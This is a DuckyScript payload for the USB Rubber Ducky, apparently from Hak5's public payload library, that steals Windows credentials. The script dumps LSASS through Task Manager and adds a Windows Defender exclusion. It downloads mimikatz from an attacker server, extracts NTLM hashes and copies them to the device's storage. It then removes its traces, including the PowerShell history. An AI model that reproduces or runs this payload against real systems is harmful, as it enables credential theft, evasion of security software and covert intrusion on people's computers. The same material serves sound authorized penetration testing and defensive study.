Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/exfiltration/ExfiltrateWindowsCredentials/PhysicalMedium/payload.txt
2971 views
1
REM Title: DuckyScript payload for data exfiltration over a physical medium

2
REM Author: jakobfriedl

3
ATTACKMODE HID STORAGE

4


5
REM OS Detection to ensure the target is Windows

6
EXTENSION PASSIVE_WINDOWS_DETECT

7
    REM VERSION 1.1

8
    REM AUTHOR: Korben

9


10
    REM CONFIGURATION:

11
    DEFINE #MAX_WAIT 150

12
    DEFINE #CHECK_INTERVAL 20

13
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2

14
    DEFINE #NOT_WINDOWS 7

15


16
    $_OS = #NOT_WINDOWS

17


18
    VAR $MAX_TRIES = #MAX_WAIT

19
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))

20
        DELAY #CHECK_INTERVAL

21
        $MAX_TRIES = ($MAX_TRIES - 1)

22
    END_WHILE

23
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN

24
        $_OS = WINDOWS

25
    END_IF

26
END_EXTENSION

27


28
IF ($_OS != WINDOWS)                                                                                                                 

29
    LED_R                                                                                                                                       

30
    STOP_PAYLOAD 

31
END_IF

32


33
REM Define the URL of the server hosting the mimikatz executable

34
DEFINE #SERVER_URL http://XXX.XXX.XXX.XXX

35


36
DELAY 1000

37
REM Delete existing dump file

38
GUI r

39
DELAY 200

40
STRINGLN powershell "rm $env:TEMP\lsass.DMP"

41
DELAY 200

42


43
REM Create lsass-dump using the TaskManager

44
GUI r

45
DELAY 200

46
STRING taskmgr

47
CTRL-SHIFT ENTER

48
DELAY 500

49
ALT y

50
DELAY 500

51
DOWNARROW

52
DELAY 1000

53
STRING lsass

54
DELAY 500

55
SHIFT F10

56
$I = 0

57
WHILE ($I < 5) 

58
    UPARROW

59
    $I = ($I + 1)

60
END_WHILE

61
ENTER

62
DELAY 500

63
ENTER

64
ALT F4

65


66
REM Add exclusion path to the Windows Defender settings

67
GUI r

68
DELAY 200

69
STRING powershell.exe

70
CTRL-SHIFT ENTER

71
DELAY 500

72
ALT y

73
DELAY 500

74
STRINGLN if((Get-MpComputerStatus).RealTimeProtectionEnabled){Set-MpPreference -ExclusionPath $env:TEMP}

75


76
REM Download mimikatz.exe from webserver

77
STRINGLN wget #SERVER_URL/mimikatz.exe -o $env:TEMP\mimikatz.exe

78
DELAY 1000

79


80
REM Execute mimikatz and the necessary commands

81
STRINGLN cd $env:TEMP

82
STRINGLN .\mimikatz.exe "privilege::debug"

83
STRINGLN log exfiltration.log

84
STRINGLN sekurlsa::minidump lsass.DMP

85
STRINGLN sekurlsa::logonpasswords

86
DELAY 5000

87
CTRL c

88
DELAY 500

89


90
REM Format mimikatz-log for exfiltration

91
STRINGLN cat .\exfiltration.log | Select-String -Pattern "NTLM" -Context 2,0  | Get-Unique > credentials.txt

92


93
REM Getting the drive letter of the USB Rubber Ducky

94
STRINGLN $d=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter

95


96
REM Creating a directory on the USB Rubber Ducky to store the files

97
DEFINE #exfil_dir $d':/'$env:COMPUTERNAME'-exfiltration-data'

98
STRING mkdir

99
SPACE

100
STRINGLN #exfil_dir

101


102
REM Exfiltration

103
STRING mv -Force $env:TEMP\exfiltration.log

104
SPACE

105
STRINGLN #exfil_dir

106
DELAY 1000

107
STRING mv -Force $env:TEMP\credentials.txt

108
SPACE

109
STRINGLN #exfil_dir

110


111
REM Clean-up 

112
STRINGLN rm $env:TEMP\lsass.DMP

113
STRINGLN rm $env:TEMP\mimikatz.exe

114
STRINGLN Remove-MpPreference -ExclusionPath $env:TEMP

115
STRINGLN Clear-Variable -Name d

116
STRINGLN rm (Get-PSReadLineOption).HistorySavePath

117